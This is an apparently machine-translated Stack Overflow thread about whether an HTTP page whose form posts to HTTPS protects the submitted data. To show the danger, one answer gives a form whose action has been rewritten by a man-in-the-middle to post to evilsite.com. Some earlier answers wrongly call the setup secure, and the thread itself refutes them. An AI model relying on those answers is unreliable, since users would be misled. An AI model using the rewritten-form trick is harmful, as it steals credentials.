说我在http://mysite.com/form.html。当收视源,我看到如果我使用来自常规http页面的<form action =“https”>,信息仍然是加密的吗?
<form method="post" action="https://mysite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
如果我打的提交按钮,当它发送到进程页/控制器形式的信息进行加密?
是 - 表单中的数据将使用SSL实施的常规握手进行加密发送。从那里你可以选择将你的用户保持在SSL之下,或者使用会话标识符将其返回到标准连接。
这不安全。见[特洛伊亨特的帖子](http://www.troyhunt.com/2013/05/your-login-form-posts-to-https-but-you.html)。 – 2014-09-24 18:49:41
'这是安全的 - 不安全的是从HTTP页面提交HTTPS表单。 MITM在这里是一个明确的关注点,但是再次,关于HTTPS表单的MITM也是一个问题。虽然在视频中提出的观点是有建设性的,但是你传达的方法却不是。请尝试在下一次添加更多单词时使用单个评论,而不是多个评论,并减少单词数量。此外,Sripathi Krishnan在四年前已经提出了这一点。感觉就像是一种死灵法,或者是博客的垃圾邮件,我们呢? – Seidr 2014-09-24 22:47:39
我会尽力在将来给出更好的评论。这篇文章是“https表单动作”的重要搜索结果,而且这种模式仍然很常见。 Sripathi Krishnan的回答较少投票,并不是公认的答案,但我认为它应该是公认的答案。 – 2014-09-28 12:23:05
它将在较低的网络级别(例如原始数据包,TCP,IP,以太网)上进行加密,而不是在应用级别上(因为它在接收方侧被透明解码)。
当目标URL使用加密(如HTTPS)时,中间的男人看不到提交表单数据的纯文本。
这不安全。见[特洛伊亨特的帖子](http://www.troyhunt.com/2013/05/your-login-form-posts-to-https-but-you.html)。 – 2014-09-24 18:50:31
是的,但请注意,培训用户在包含表单的页面上查找SSL挂锁已经付出了相当大的努力(无论培训是否有效是另一回事)。一般来说,浏览器会抱怨如果一个安全页面上的表单被提交给一个不安全的页面,所以这种受过训练的行为确实有积极的意义。
如果你这样执行你的表单,用户将无法知道表单提交将是安全的(无需查看页面代码),直到他们点击提交。这在你的用例中可能并不重要,但如果表单中的数据是用户只需要安全地提交的,那么这种做法就会违背培训人们寻找挂锁的企图。
谢谢,这是一个好点! – John 2010-03-30 17:39:03
没有。 “用户将无法知道表单提交在他们提交之前是安全的”:它不会被安全传输!攻击者可能已经注入了JavaScript键盘记录或更改了表单操作。见[特洛伊亨特的帖子](http://www.troyhunt。COM/2013/05 /你的登录表单,职位到HTTPS,但-you.html)。 – 2014-09-24 18:49:15
不能保证它会被加密,或者提交的数据将到达您的网站。
由于原始响应是通过http,中间人可能已经改变了您的html源代码,或者可能已经插入了一些javascript来修改您的窗体的操作参数。因此,你的表格可以这样写的,当它到达浏览器
<form method="post" action="https://evilsite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
这意味着,如果你想成为安全,你必须使用HTTPS的所有网页。
非常好的一点 – NibblyPig 2010-04-30 12:14:16
有趣的问题! – NibblyPig 2010-03-30 15:10:37